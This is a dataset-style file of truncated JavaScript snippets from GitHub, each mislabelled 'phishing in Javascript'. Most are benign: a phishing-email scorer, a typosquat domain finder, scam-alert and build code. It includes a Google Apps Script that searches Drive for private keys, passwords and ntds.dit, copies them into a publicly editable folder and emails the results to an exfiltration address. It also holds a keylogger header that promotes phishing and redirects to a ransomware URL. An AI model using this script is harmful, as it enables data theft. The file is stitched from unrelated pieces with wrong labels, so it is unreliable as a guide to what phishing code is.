let idx = email.lastIndexOf(""@"");
id = email.slice(0, idx);
dmn = email.slice(idx + 1);
len1 = id.length;
len2 = dmn.length;
// Check Email ID for Number Count >= 3
idNums = id.replace(/\D/g, """");
if (idNums && idNums.length >= 3) scale += 2;
// Check Email Domain for Number Count > 0
dmnNums = dmn.replace(/\D/g, """");
if (dmnNums && dmnNums.length > 0) scale += 2;
// Check Email Domain for Common Domain
let found = DOMAINS.find(d => d === dmn);
if (!found) scale += 1;
return scale;
}
function URLcheck(body) {
url = body.match(
/[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)/
);
if (url) return 2;
return 0;
}
function greetingCheck(greeting) {
let scale = 0;
for (i = 0; i < 3; i++) {
let found = GREETINGS.find(greet => greeting[i] === greet);
if (found) scale += 1;
if (scale > 1) return 2;
}
return scale;
}
function urgencyCheck(word) {
let found = URGENCY_WORDS.find(w => w === word);
if (found) return 5 / 3;
return 0;
}
function confirmCheck(word) {
let found = CONFIRMING_WORDS.find(w => w === word);
if (found) return 2;
return 0;
}
function dictionaryCheck(body) {
body = body
.replace(/[.,'\/#!$%\^&\*;:{}=\-_`~()]/g, """")
.replace(/\r?\n|\r/g, "" ""); // Remove special chars
let words = body.split("" "");
words = words.filter(w => Boolean(w)); //Remove falsey values
let greeting = words.splice(0, 3);
let grtScale = greetingCheck(greeting);
let urgScale = 0;
let cfmScale = 0;
words.forEach(word => {
if (urgScale < SCALES.URGENCY) urgScale += urgencyCheck(word);
if (cfmScale < SCALES.CONFRIM) cfmScale += confirmCheck(word);
});
return { grtScale, urgScale, cfmScale };
}
function phishCheck(email, body) {
let eScale = emailCheck(email);
let urlScale = URLcheck(body);
let dictScale = dic",Javascript,PhishersOfMen/Assn5-Phishing-SQLI,2025-05-22T22:01:02.523095,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"#!/usr/bin/env node
const fs = require('fs');
const debug = require('debug')('fuzz:main');
const Promise = require('bluebird');
const program = require('commander');
const request = require('request');
const libssdeep = require('ssdeep');
const csv = require('csv');
const ProgressBar = require('progress');
const CONF = require('./config');
const { printError, printInfo, printResult, printBanner, parseTarget, bye } = require('./lib/utils');
const { DomainFuzz, DomainDict, DomainThread } = require('./lib');
const fuzz = (opts, domains, worker) => {
const total = domains.length;
const bar = new ProgressBar('Running [:bar] :percent :etas', {
complete: '=',
incomplete: ' ',
width: 50,
total,
});
Promise
.map(domains, (domain) => {
bar.tick(1);
return worker.run(domain);
}, { concurrency: opts.concurrency })
.then((result) => {
if (opts.option_output) {
let data;
if (opts.option_format === 'JSON') {
data = JSON.stringify(result, null, 4);
fs.appendFile(opts.option_output, data, 'utf8', (err) => {
if (err) printError(err.message);
});
} else if (opts.option_format === 'CSV') {
data = [];
const columns = 'fuzzer,domain-name,dns-a,dns-aaaa,dns-mx,dns-ns,geoip-country,whois-created,whois-updated,ssdeep-score';
data.push(columns.split(','));
for (const domain of result) {
data.push(columns.split(',').map(_ => domain[_]));
}
csv.stringify(data, (parseErr, res) => {
fs.appendFile(this.option_output, res, 'utf8', (err) => {
if (err) printError(err.message);
});
});
}
}
for (const domain of result) {
printResult(domain);
}
})
.catch(err => printError(err.message));
};
const main = () => {
const opts = program
.version(CONF.version)
.usage('[options] DOMAIN')
.description(`Find similar-loo",Javascript,monkeym4ster/DomainFuzz,2025-05-22T22:01:02.651975,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const fs = require(""fs"");
// load puppeteer
const puppeteer = require('puppeteer');
const window_height = 768;
const window_width = 1366;
const studio_url = ""https://studio.youtube.com/"";
// directory contains the videos you want to upload
const upload_file_directory = ""your video directory"";
// change user data directory to your directory
const chrome_user_data_directory = ""C:\\Users\\user\\AppData\\Local\\Chromium\\User Data"";
const title_prefix = ""video title prefix "";
const video_description = """";
const DEFAULT_ARGS = [
'--disable-background-networking',
'--enable-features=NetworkService,NetworkServiceInProcess',
'--disable-background-timer-throttling',
'--disable-backgrounding-occluded-windows',
'--disable-breakpad',
'--disable-client-side-phishing-detection',
'--disable-component-extensions-with-background-pages',
'--disable-default-apps',
'--disable-dev-shm-usage',
'--disable-extensions',
// BlinkGenPropertyTrees disabled due to crbug.com/937609
'--disable-features=TranslateUI,BlinkGenPropertyTrees',
'--disable-hang-monitor',
'--disable-ipc-flooding-protection',
'--disable-popup-blocking',
'--disable-prompt-on-repost',
'--disable-renderer-backgrounding',
'--disable-sync',
'--force-color-profile=srgb',
'--metrics-recording-only',
'--no-first-run',
'--enable-automation',
'--password-store=basic',
'--use-mock-keychain',
];
let files = [];
fs.readdir(upload_file_directory, function (err, temp_files) {
if (err) {
console.log('Something went wrong...');
return console.error(err);
}
for (let i = 0; i < temp_files.length; i++) {
files.push(temp_files[i]);
}
});
try {
(async () => {
const browser = await puppeteer.launch(
{
'headless': false, // have window
executablePath: null,
userDataDir: chrome_user_data_directory,
ignoreDefaultArgs: ",Javascript,last2win/youtube-upload-multi-videos,2025-05-22T22:01:02.782934,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"import warning from './station.svg'
import terra from './terra.svg'
import './fonts.css'
import './App.css'
const SAFE_PAGE = 'https://station.money'
function App() {
if (!document.referrer || document.referrer === window.location.href) {
//window.location.href = SAFE_PAGE
}
if (document.referrer) {
const { hostname } = new URL(document.referrer)
if (hostname === 'terra.money' || hostname.endsWith('.terra.money')) {
return (
)
}
}
return (
PHISHING ALERT
You are trying to visit {document.referrer}
which is a known scam website.
{
window.location.href = SAFE_PAGE
}}
className='button__main'
>
Go back to safety
{/*
Visit anyway
*/}
)
}
export default App
",Javascript,terra-money/scam-alert-web,2025-05-22T22:01:02.912967,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const fs = require('fs')
const fsExtra = require('fs-extra')
const rmRf = require('rimraf')
const Streams = require('mississippi')
const bind = require('ap').partial
const async = require('./async')
const Browserify = require('browserify')
const watchify = require('watchify')
const sassStream = require('sass-css-stream')
start(function(err){
if (err) throw err
console.log('end')
})
function start(cb){
async.series({
clean,
build,
}, cb)
}
function clean(cb){
fsExtra.remove('./dist/', cb)
}
function build(cb){
async.parallel({
buildJs,
buildCss,
buildStatic,
}, cb)
}
function buildJs(cb) {
var browserify = Browserify({
entries: ['./src/js/index.js'],
cache: {},
packageCache: {},
// plugin: [watchify],
})
browserify.on('update', bundle)
async.series({
buildJsPrep: bind(fsExtra.mkdirs, './dist/js'),
buildJsStart: start,
}, cb)
function start(cb){
var firstBundle = bundle()
Streams.finished(firstBundle, cb)
}
function bundle() {
console.log('bundle')
return Streams.pipeline(
browserify.bundle(),
fs.createWriteStream('./dist/js/bundle.js')
)
}
}
function buildCss(cb) {
async.series({
buildCssPrep: bind(fsExtra.mkdirs, './dist/css'),
buildCssStart: start,
}, cb)
function start(cb) {
var pipeline = Streams.pipeline(
fs.createReadStream( './src/css/index.scss' ),
sassStream( './src/css/index.scss' ),
fs.createWriteStream( './dist/css/bundle.css' )
)
Streams.finished(pipeline, cb)
}
}
function buildStatic(cb) {
async.parallel({
imgs: bind(fsExtra.copy, './src/img/', './dist/img/'),
faviconAndroid: bind(fsExtra.copy, './src/manifest.json', './dist/manifest.json'),
faviconIE: bind(fsExtra.copy, './src/browserconfig.xml', './dist/browserconfig.xml'),
fonts: bind(fsExtra.copy, './src/fonts/', './dist/fonts/'),
index: bind(fsExtra.copy, './src/index.html'",Javascript,409H/landing,2025-05-22T22:01:03.059650,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"// Created by Greg Carson @ Feb 2017
// ---------------------------------------
// Play nice and use for security training
// and testing.
function drivePassSearch() {
// This creates a PUBLICALLY AVAILABLE RWX FOLDER in Drive under the executing users context.
// This can be disabled for Google Apps for Business users:
// https://support.google.com/a/answer/60781?hl=en
// Personal users shit out of luck? Not sure haven't looked into it.
var folder = DriveApp.createFolder('Evil Folder');
folder.setSharing(DriveApp.Access.ANYONE, DriveApp.Permission.EDIT);
// Construct malicious search query on drive. Look for PDFs? DOC/XLS files? If you are looking for an extension use 'title contains'
// If you want to search through content for a keyword use 'fullText contains' instead
// You can construct more complex queries using logical operators, for example: 'and (mimeType contains 'image/' or mimeType contains 'video/')'
// Not aware of case sensitivity or ability to perform regular expressions
// Search Ideas? title contains .cer .pem .der .crt .pub id_rsa .docx .xlsx .vsd password .nessus ntds.dit
// or fullText contains password or any other combination of keywords of interest such as target individuals, target servers, etcetera
var files = DriveApp.searchFiles(
'modifiedDate > ""2013-02-28"" and title contains ""SEARCHTERMHERE""');
while (files.hasNext()) {
var file = files.next();
Logger.log(file.getDownloadUrl());
Logger.log(file.getUrl());
Logger.log(file.getName());
var name = file.getName();
file.makeCopy(name,folder);
Logger.log(file.getDownloadUrl());
Logger.log(file.getUrl());
}
// Write Logger data to body of email and send to specified recipient
// Sender address is the current active user
Logger.log(folder.getUrl());
var recipient = ""RECPIENT-EXFIL-EMAIL-ADDRESS-HERE"";
var subject = 'Google Drive Query - KDBX';
var body = Logger.getLog();
MailApp.sendEmail(recipient, subj",Javascript,gregkcarson/GoogleAppScriptSE,2025-05-22T22:01:03.220189,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const express = require(""express"");
const app = express();
const http = require(""http"");
const server = http.createServer(app);
const puppeteer = require('puppeteer');
const port = 9001;
var browser;
app.use(express.json())
app.post('/bot/url', function(req, res) {
res.setHeader('Content-Type', 'application/json');
console.log(req.body);
let url = req.body.url
console.log(url);
startBot(url)
.then(() => {
res.send({
message: 'success',
data: req.body
})
})
.catch((err) => {
res.send({
message: 'failed',
error: err
})
})
})
async function startBot(url) {
console.log(browser);
if(typeof browser !== 'undefined'){
await browser.close()
}
const minimal_args = [
'--autoplay-policy=user-gesture-required',
'--disable-background-networking',
'--disable-background-timer-throttling',
'--disable-backgrounding-occluded-windows',
'--disable-breakpad',
'--disable-client-side-phishing-detection',
'--disable-component-update',
'--disable-default-apps',
'--disable-dev-shm-usage',
'--disable-domain-reliability',
'--disable-extensions',
'--disable-features=AudioServiceOutOfProcess',
'--disable-hang-monitor',
'--disable-ipc-flooding-protection',
'--disable-notifications',
'--disable-offer-store-unmasked-wallet-cards',
'--disable-popup-blocking',
'--disable-print-preview',
'--disable-prompt-on-repost',
'--disable-renderer-backgrounding',
'--disable-setuid-sandbox',
'--disable-speech-api',
'--disable-sync',
'--hide-scrollbars',
'--ignore-gpu-blacklist',
'--metrics-recording-only',
'--mute-audio',
'--no-default-browser-check',
'--no-first-run',
'--no-pings',
'--no-sandbox',
'--no-zygote',
'--password-store=basic',
'--use-gl=swiftshader',
'--use-mock-keychain',
];
console.log(""Launching Headless Browser::::::::::::"");
browser = await puppeteer.launch({
",Javascript,arunjohn96/webndi,2025-05-22T22:01:03.383520,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"import React from 'react';
import {
Route,
Switch
} from 'react-router-dom';
const isBrowser = typeof window !== ""undefined"" && typeof window.document !== ""undefined"";
const dummy = () => {};
const HelpTextPage = isBrowser? React.lazy(() => import(""./components/helpText"")): dummy;
const WebhookPage = isBrowser? React.lazy(() => import(""./pages/guild_dashboard/server_view"")): dummy;
const ManagerRootPage = isBrowser? React.lazy(() => import(""./pages/emote_manager/manager_root"")): dummy;
const LoginPage = isBrowser? React.lazy(() => import(""./pages/login"")): dummy;
const InvitePage = isBrowser? React.lazy(() => import(""./pages/invite"")): dummy;
const PrivacyPolicy = isBrowser? React.lazy(() => import(""./pages/policy"")): dummy;
const GuildCreatorPage = isBrowser? React.lazy(() => import(""./pages/guild_builder/guild_builder"")): dummy;
const GuildSelectorPage = isBrowser? React.lazy(() => import(""./pages/guild_builder/guild_selector"")): dummy;
const GuildStatusPage = isBrowser? React.lazy(() => import(""./pages/guild_builder/guild_status"")): dummy;
const LicensePage = isBrowser? React.lazy(() => import(""./pages/licenses"")): dummy;
const CommandPage = isBrowser? React.lazy(() => import(""./pages/commands"")): dummy;
const BotAddedPage = isBrowser? React.lazy(() => import(""./pages/bot_added"")): dummy;
const PremiumPage = isBrowser? React.lazy(() => import(""./pages/premium"")): dummy;
const PublicPackSearchPage = isBrowser? React.lazy(() => import(""./pages/public_packs/search"")): dummy;
const PublicPackPage = isBrowser? React.lazy(() => import(""./pages/public_packs/view"")): dummy;
const PhishingPage = isBrowser? React.lazy(() => import(""./pages/phishing"")): dummy;
const TermsPage = isBrowser? React.lazy(() => import(""./pages/terms"")): dummy;
export const FullRouter = ({loggedIn, HomePage}) => {
return (
Loading Page...}>
{!loggedIn && }
{loggedIn && Try this working mirror instead';
var element = document.getElementById('mainwarn');
element.innerHTML += altelem;
}
}
function newMirr(site, success) {
if(site) {
getAjax('https://onion.live/api/v2/public/mirrors?site='+site+'&max=1', '', success);
}
}
function handleResponse(message) {
console.log(`Message from the background script: ${message.response}`);
}
function handleError(error) {
console.log(`Error: ${error}`);
}
function getAjax(url, data, success) {
var params = typeof data == 'string' ? data : Object.keys(data).map(
function(k){ return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]) }
).join('&');
var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject(""Microsoft.XMLHTTP"");
xhr.open('GET', url);
xhr.onreadystatechange = function() {
if (xhr.readyState>3 && xhr.status==200) { success(xhr.responseText); }
if (xhr.readyState>3 && xhr.status!==200) { success(xhr.responseText); }
};
xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send(params);
return xhr;
}
function checkWorking(url, site) {
var MrChecker = new XMLHttpRequest(),
CheckThisUrl = ""http://""+url+""/"";
MrChecker.open('get', CheckThisUrl, true);
MrChecker.onreadystatechange = checkReadyState;
function checkReadyState() {
if (MrChecker.readyState === 4) {
if (MrChecker.status >= 200 || MrChecker.status < 304) {
var element = document.getElementById('mainwarn');
if(element) {
",Javascript,OnionDotLive/onionliveplugin,2025-05-22T22:01:04.017163,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/*
####################################################################
# s'abonner sur ma chaine youtube pour avoir plus de code phishing #
# et hacking,il me donne le courage de faire les codes phishing #
# #
# subscribe on my youtube channel to have more phishing code #
# and hacking, it gives me the courage to do the phishing codes #
# #
# ||~~ BY ~~ hakanonymos ~~|| #
# #
# #
# #
# skype et email : hakanonymos@hotmail.com #
####################################################################
*/
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
if (typeof document.body.scrollTop != ""undefined""){ //IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval(""pollActivity()"",1); //poll scrolling votre site de redrection 10000 = 10 seconde
timerRedirect = setInterval(""location.href='https://panafricaine.com/ransomware/'"",300 0000); //temps de redirection
}
else if (typeof window.pageYOffset != ""undefined""){ //other browsers that support pageYOffset/pageXOffset instead
",Javascript,hakanonymos/chromeKeylogger,2025-05-22T22:01:04.152105,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"import { useEffect, useState } from ""react"";
import Navbar from ""./components/Navbar/Navbar"";
import Breadcrumbs from ""./components/Breadcrumbs/Breadcrumbs"";
import ProductDetails from ""./components/ProductDetails/ProductDetails"";
import ProductCarousel from ""./components/ProductCarousel/ProductCarousel"";
import Swal from ""sweetalert2"";
import ""./App.css"";
const App = () => {
const [darkMode, setDarkMode] = useState(false);
const toggleDarkMode = () => setDarkMode(prevState => !prevState);
useEffect(() => {
Swal.fire({
title: ""¡Atención!"",
text: ""Esta web NO es el sitio oficial de Mercado Libre, se trata de un challenge de Frontend, no es un intento de phishing hacia los usuarios que la visitan."",
icon: ""warning"",
confirmButtonText: ""¡Entendido!"",
confirmButtonColor: ""#3484fa"",
backdrop: ""rgba(0, 0, 0, 0.8)"",
});
}, []);
return (
<>
>
);
};
export default App;
",Javascript,GastonPerez97/mercadolibre-details-challenge,2025-05-22T22:01:04.271013,training